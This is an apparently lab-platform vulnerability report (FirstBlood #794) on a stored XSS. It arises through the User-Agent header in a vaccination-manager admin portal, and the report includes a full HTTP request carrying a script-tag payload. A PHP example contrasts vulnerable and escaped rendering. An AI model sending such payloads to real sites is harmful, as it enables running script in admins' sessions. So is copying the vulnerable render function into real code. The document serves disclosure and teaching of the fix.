FirstBlood-#794 — Stored XSS via User-Agent header value in /vaccination-manager/portal.php
This issue was discovered on FirstBlood v2
On 2021-10-28, panya Level 7 reported:
The vaccination manager admin portal unsafely reflects a User-Agent header's value (saved to the DB when a user sends vaccination proof via the /vaccination-manager/pub/submit-vaccination-proof.php endpoint), which leads to Stored XSS.
Example request:
POST /vaccination-manager/pub/submit-vaccination-proof.php HTTP/1.1
Host: 13f5cfe96d8e-panya.a.firstbloodhackers.com
Content-Length: 66604
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: https://13f5cfe96d8e-panya.a.firstbloodhackers.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6Ttb4gutNkKWWkV6
User-Agent: <script>alert(origin)</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://13f5cfe96d8e-panya.a.firstbloodhackers.com/vaccination-manager/pub/upload-vaccination-proof.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
------WebKitFormBoundary6Ttb4gutNkKWWkV6
Content-Disposition: form-data; name="email"
[email protected]
------WebKitFormBoundary6Ttb4gutNkKWWkV6
Content-Disposition: form-data; name="vaccination_proof"; filename="pepe.png"
Content-Type: image/png
PNG
IHDR D
<skipped>
------WebKitFormBoundary6Ttb4gutNkKWWkV6--
Notice that I changed the User-Agent header value to <script>alert(origin)</script>.
The script tag is reflected in the vaccination-manager's admin portal and triggers an alert with the text "https://13f5cfe96d8e-panya.a.firstbloodhackers.com".
Impact:
An attacker could execute JS code on behalf of a vaccination-manager admin.
Mitigation:
The User-Agent header's value should be properly escaped or sanitized.
P2 High
Endpoint: /vaccination-manager/portal.php
Parameter: User-Agent
Payload: <script>alert(origin)</script>
FirstBlood ID: 29
Vulnerability Type: Stored XSS
When uploading vaccination proof it is possible to achieve stored XSS against admins via the User-Agent header. As this value is typically not thought of as user controlled, the developers did not think it was 'worth' preventing XSS in it.
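The escaping the report's mitigation asks for, shown as an added example that is not FirstBlood's code: a minimal PHP rendering of a stored submission row, with the vulnerable concatenation beside an output-encoded version. The function names, the row layout and the sample request below are assumptions for illustration, not the application's real code.

```php
<?php
// Added example, not code from FirstBlood. Function names, the row layout
// and the constructed request/row are assumptions for illustration.
declare(strict_types=1);

// Capture at submit time (the submit-vaccination-proof.php side). Storing the
// raw header is acceptable as long as it is encoded when rendered; capping the
// length limits how much an attacker can park in the table.
function captureUserAgent(array $server): string
{
    $ua = $server['HTTP_USER_AGENT'] ?? '';
    return substr($ua, 0, 512);
}

// Vulnerable render (the portal.php side): the stored header is concatenated
// straight into HTML, so a header of <script>...</script> becomes live markup.
function renderRowVulnerable(array $row): string
{
    return '<tr><td>' . $row['email'] . '</td><td>' . $row['user_agent'] . '</td></tr>';
}

// HTML text-context encoder: < > & " ' become entities; invalid UTF-8 is
// replaced instead of silently dropped so the encoder never returns ''.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened render: every request-controlled value is encoded for the context
// it lands in. The e-mail is encoded as well, since it is also attacker input.
function renderRowSafe(array $row): string
{
    return '<tr><td>' . h($row['email']) . '</td><td>' . h($row['user_agent']) . '</td></tr>';
}

// Constructed request and row mirroring the report's payload (not real data).
$fakeServer = ['HTTP_USER_AGENT' => '<script>alert(origin)</script>'];
$row = [
    'email'      => 'someone@example.com',
    'user_agent' => captureUserAgent($fakeServer),
];

echo 'vulnerable: ' . renderRowVulnerable($row) . PHP_EOL;
echo 'hardened:   ' . renderRowSafe($row) . PHP_EOL;
```

Run with `php example.php`: the first line carries the script tag as live markup, the second carries it entity-encoded, which the browser displays as text. The encoder above is only correct for HTML text and double-quoted attribute values; if the header were ever written into a JavaScript string or a URL, that context would need its own encoder.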